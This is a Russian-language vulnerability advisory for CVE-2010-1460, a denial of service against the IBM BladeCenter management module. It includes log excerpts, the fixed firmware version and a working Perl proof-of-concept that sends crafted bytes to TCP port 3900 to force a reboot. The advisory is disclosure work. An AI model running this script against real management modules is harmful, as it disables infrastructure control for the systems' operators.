CVE-2010-1460

Вендор

IBM

Продукт

IBM BladeCenter Managemet Module 

Тип уязвимости

Отказ в обслуживании

Reported

24.07.2009

Date of Public Advisory

15.04.2010

Автор

Алексей Синцов

Детальное описание

Атакующий может перезагрузить модуль путем посылки ряда специально-сформированных TCP пакетов на порт 3900. После этого модуль уйдет в перезагрузку, отключив управляющий порт. При этом в журналах будут следующие записи. 

Сетевой журнал:

Jul 6 16:16:48 212.X.X.X NOTICE mgmt: Port MGT1 DISABLED and MGT2 ENABLED because Management Module 2 is active 
Jul 6 16:16:49 212.X.X.X ALERT system: link down on port MGT1 
Jul 6 16:16:51 212.X.X.X NOTICE system: link up on port MGT2 
Jul 6 16:17:18 212.X.X.X NOTICE mgmt: Management via all ports is DISABLED thru I2C Control Register 
Jul 6 16:17:20 212.X.X.X NOTICE mgmt: New Management IP Address 192.168.Y.Z configured 
Jul 6 16:17:23 212.X.X.X NOTICE mgmt: Management via all ports is ENABLED thru I2C Control Register 

Журнал BladeCenter:

9 I SERVPROC 07/06/09, 16:17:19 (SN#YK31337BR11L) Management Module in bay 1 is standby. 
10 I SERVPROC 07/06/09, 16:16:54 (SN#YK31337BR11L) Management module network initialization complete 
11 I SERVPROC 07/06/09, 16:16:51 (SN#YK31337BR11L) ENET Hostname=BladeMM, IP=192.168.Y.Y, GW=0.0.0.0, Mask=255.255.255.0. 
12 I SERVPROC 07/06/09, 16:16:50 (SN#YK31337BR11L) Management Module in bay 2 is primary. 
13 E SERVPROC 07/06/09, 16:16:45 AMM reset due to watchdog timeout 

Пример 
*********
#!/usr/bin/perl 
# 
# BladeCenter AMM DoS 
# by Alexey Sintsov 
# Digital Security Research Group 
# 
# [http://dsecrg.com] 
# 

use Socket; 

$target='192.168.50.61'; 

for ($i=1;$i<=20;$i++) 
{ 
socket(SERVER, AF_INET, SOCK_STREAM, getprotobyname('tcp')); 
$trash="\xf1"x17; 
$target_ = inet_aton($target); 
$paddr=sockaddr_in(3900,$target_); 

sleep(2); 
if (connect(SERVER, $paddr)) 
{ 
recv(SERVER,$buf,20,0); 
send(SERVER,$trash,1); 
close(SERVER); 
print "$i - fire!\n"; 
} 
else 
{ 
print "$i - refused!\n"; 
} 
} 
print "\nDone\n"; 

Решение 
**********
Проблема была решена в прошивке для AMM, начиная с версии bpet50g.